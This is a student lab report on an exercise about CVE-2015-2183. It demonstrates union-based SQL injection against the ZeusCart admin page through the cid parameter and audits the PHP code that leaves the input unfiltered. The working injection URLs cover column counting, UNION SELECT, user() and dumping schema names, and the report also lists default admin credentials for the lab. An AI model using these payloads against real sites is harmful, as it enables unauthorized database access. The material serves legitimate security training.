Author:ZERO-A-ONE
Date:2020-12-16
1. The purpose of the experiment
Source code audit to find out whether the target host has SQL injection vulnerabilities
2. Experimental principle
SQL injection means that an attacker uses the vulnerability of web application data and code that are not strictly separated, and does not perform strict escape character filtering and type checking on user input, to inject a carefully constructed SQL command into the back-end database engine for execution, resulting in the database Information leakage, website hacking, database system administrator account tampering, server being hacked to install backdoor remote control, etc.
Three, the experimental environment
-
Open the [CVE Vulnerability Instance Explanation] course in [SimpleSPC Information Security Cloud Experimental System], and select [CVE-2015-2183 zeu] experimental project
-
Attacker win7 (IP address: 192.168.1.2), target host win 2008 (IP address: 192.168.1.3)
Fourth, the experimental steps
1. Visit http://192.168.1.3/admin/, log in with the account admin and password admin888, the login page is as follows:
2. Visit http://192.168.1.3/admin/? Do=editcurrency&cid=1, the result is as follows:
3. Visit http://192.168.1.3/admin/? Do=editcurrency&cid=1', ('is the left single quotation mark), the page is found to be different from the page in step 3. The screenshot is shown below, and it is judged that the target website has SQL injection vulnerabilities
4. Visit http://192.168.1.3/admin/? Do=editcurrency&cid=1+order+by+5++, the page is found to be normal, the screenshot is as follows:
5. Visit http://192.168.1.3/admin/? Do=editcurrency&cid=1+order+by+6++, it is found that the page is different from step 4, indicating that 5 fields are currently queried. The screenshot is as follows:
6. Visit http://192.168.1.3/admin/? Do=editcurrency&cid=1+union+select+1, 2, 3, 4, 5++, found that 2 and 4 are echoed, the screenshot is as follows:
7. Visit http://192.168.1.3/admin/? Do=editcurrency&cid=1+union+select+1, user(), 5++, query the current user and version, the screenshot is shown below
8. Visit http://192.168.1.3/admin/? Do=editcurrency&cid=1+union+select+1group_concat(schema_name),3,4,5+from+information_schema.schemata++, query all current databases, the screenshot is as follows:
Code audit on CCurrencySettings.php of c:\phpStudy\WWW\admin\classes\Core\Settings\ and Query.php of c:\phpStudy\WWW\Bin\
Five, experimental thinking
1. Please write out the select statements generated by the showEditCurrency function in steps 3 to 8 according to your understanding of CCurrencySettings.php and Query.php source code reading in step 9
Analyze the source code:
function showEditCurrency($Err)
{
$sqlCat="SELECT * FROM country_table ORDER BY cou_name";
$queryCat = new Bin_Query();
$queryCat->executeQuery($sqlCat);
$sqlCat1="SELECT * FROM currency_codes_table ORDER BY currency_name";
$queryCat1 = new Bin_Query();
$queryCat1->executeQuery($sqlCat1);
if(isset($_GET['cid']))
{
$currencyid=trim($_GET['cid']);
$sql="select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid";
$qry = new Bin_Query();
$qry->executeQuery($sql);
return Display_DCurrencySettings::showEditCurrency($queryCat->records,$queryCat1->records,$qry->records,$Err);
}
else
return '<div class="alert alert-error">
<button type="button" class="close" data-dismiss="alert">×</button> No more currency.</div>';
}
It can be known that the sql statement that is actually called at the end is
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid
Then read the source code to find:
$currencyid=trim($_GET['cid']);
$sql="select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid";
The parameter cid we entered becomes the currencyid
third step:
http://192.168.1.3/admin/?Do=editcurrency&cid=1‘
The executed sql statement is:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1‘
Vulnerability discovery: Through this we can find that the SQL statement execution failed, so the execution result will return a Boolean value, because we found that the page is different from the previous page, indicating that the server executed our SQL query statement, so we can know that there is a SQL injection vulnerability
the fourth step:
http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+5+--+
The executed sql statement is:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+5+--+
the fifth step:
http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+6+--+
The executed sql statement is:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+6+--+
The sixth step:
http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,2,3,4,5++
The executed sql statement is:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,2,3,4,5++
The seventh step:
http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,user(),5+--+
The executed sql statement is:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,user(),5+--+
The eighth step:
http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+
The executed sql statement is:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+
2. The page display of step 4 and step 5 are different, what do you think may be the reason?
Reason : The number of fields in the currency_master_table table is 5
First look at the query statements in the fourth and fifth steps:
the fourth step:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+5+--+
the fifth step:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+6+--+
The reason for this is to use ORDER BY to determine the number of fields, ORDER BY n+1;so that n keeps increasing until an error page appears. Here, we can query correctly before 5, and when the number of fields increases to 6, it exceeds the number of fields in the table query. So the front and back pages are different, that is, an error has occurred, so the number of fields in the table can be obtained as 5
3. Only 2 and 4 are displayed in step 6. What do you think may be the reason?
Reason: The display position of the webpage is 2 and 4, and the webpage only has two windows 2 and 4 open
First look at the sql statement of 6:
select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,2,3,4,5++
The UNION operator is used to combine the result sets of two or more SELECT statements
That is, the common method of judging the display position in the SQL injection with echo, this display position refers to the position where the data can be displayed in the web page
id=1+union+select+1,2,3,4,5++
Only 2 and 4 can be displayed, then the webpage can only display the information in the second and fourth columns, and cannot display the information in other columns. It can also be understood that there are only two windows 2 and 4 open on the web page, and you must go through this window if you want to query database information. So if we want to know the value of an attribute, such as admin, we must put the admin attribute in the 2 or 4 position, so that the admin information can be exposed through the second or fourth column
4. (Optional or not) Why does the target website have SQL injection vulnerabilities? Please answer according to your audit results of Query.php code
function executeQuery($sql, $fields = array())
{
//if(substr_count($sql,'#')!=count($fields))
//return false;
if(count($fields)>0)
$sql = $this->makeQuery($sql,$fields); // Security::makeQuery();
$i=0;
$this->rs = mysql_query($sql);
$this->sql = $sql;
$this->insertid = mysql_insert_id();
if(is_resource($this->rs))
$this->totrows = mysql_num_rows($this->rs);
if(!mysql_affected_rows() || $this->totrows < 1)
return false;
else
{
while($fetch = mysql_fetch_array($this->rs))
$this->records[$i++] = $fetch;
for($i=0;$i<count($this->records);$i++)
{
foreach ($this->records[$i] as $key=>$item)
{
if(is_numeric($key))
unset($this->records[$i][$key]);
}
}
return true;
}
}
Reason: It can be found that executeQuery did not do any check on the cid parameters, and fully trusted the user's cid input, which led to the generation of sql injection vulnerability
to sum up:
ZeusCart is an open source shopping system designed for small and medium-sized online shops based on PHP and MySQL. There is a SQL injection vulnerability in the management background of ZeusCart4, which is caused by the admin/URI not sufficiently filtering the'id' parameter in the dispatchdetail and subadminmgtedit operations; the admin/URI does not sufficiently filtering the'cid' parameter in the editcurrency operation. Remote attackers can use this vulnerability to execute arbitrary SQL commands.